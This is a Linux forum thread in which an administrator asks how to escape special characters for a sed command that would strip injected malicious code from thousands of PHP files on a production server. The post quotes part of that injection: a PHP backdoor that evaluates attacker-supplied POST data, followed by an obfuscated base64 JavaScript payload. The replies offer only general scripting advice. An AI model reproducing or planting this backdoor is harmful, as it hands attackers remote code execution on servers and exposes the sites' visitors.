Find the answer to your Linux question:
Hi, Our production server was infested with malicious javascript codes which is common in some 5332 PHP files. To do a mass-replace of the code which looks like something like ...
Enjoy an ad free experience by logging in. Not a member yet? Register.

Question Backslashing the special charaters in a search replace text

Hi,

Our production server was infested with malicious javascript codes which is common in some 5332 PHP files.
    To do a mass-replace of the code which looks like something like this
    Code:
     ?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define
    ('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbigpe3ZhciBLdjU4PSd2YT43Mj4yMGE+M2Q+MjJTY3I
    +NjlwdD40NW5nPjY5bmU+MjI+MmNiPjNkPjIyVmU+NzJzaT42Zm4oKSs+MjI+MmNqPjNkPjIyPjIyPjJjdT4zZG5hdmlnYXRvcj4yZT43NXNlPjcyQWdlbj43ND4zYmk
    +NjYoKD43NT4yZWk+NmVkZXg+NGY+NjYoPjIyPjQzaD43Mm8+NmRlPjIyKT4zYz4zMCk+MjY+MjYodT4yZT42OW5kPjY1eE8+NjY+Mjg+MjJXPjY5bj4yMi
    Though the pasted code was a long line, what i pasted here is just a one-third of it.

Now, since the code is common in all files, i can do a sed replace command but to do that the
    special characters needs to be backslashed.

Can anyone tell me a simple script to do the backslashing of the malicious code, so that i can mass replace it in all the files.
    Thanks in Advance

Just Joined!
    perhaps you could just store the entire string in a text-file and let the replacement script just read that text-file? it ought to read the special characters correctly immediately.

Hi morfanaion,
    thanks for the suggestion, but i dont know how to pass a file as a arguement to sed command.
    Can you provide me with a sample script?

4. $spacer_open
    $spacer_close
    Just Joined!
    Not much of a scripter myself, no experience in scripting on Linux, I just write C++ programs. However, should go the same as any other argument you pass to a script, you just pass the filename as an argument and in the script you just open that file.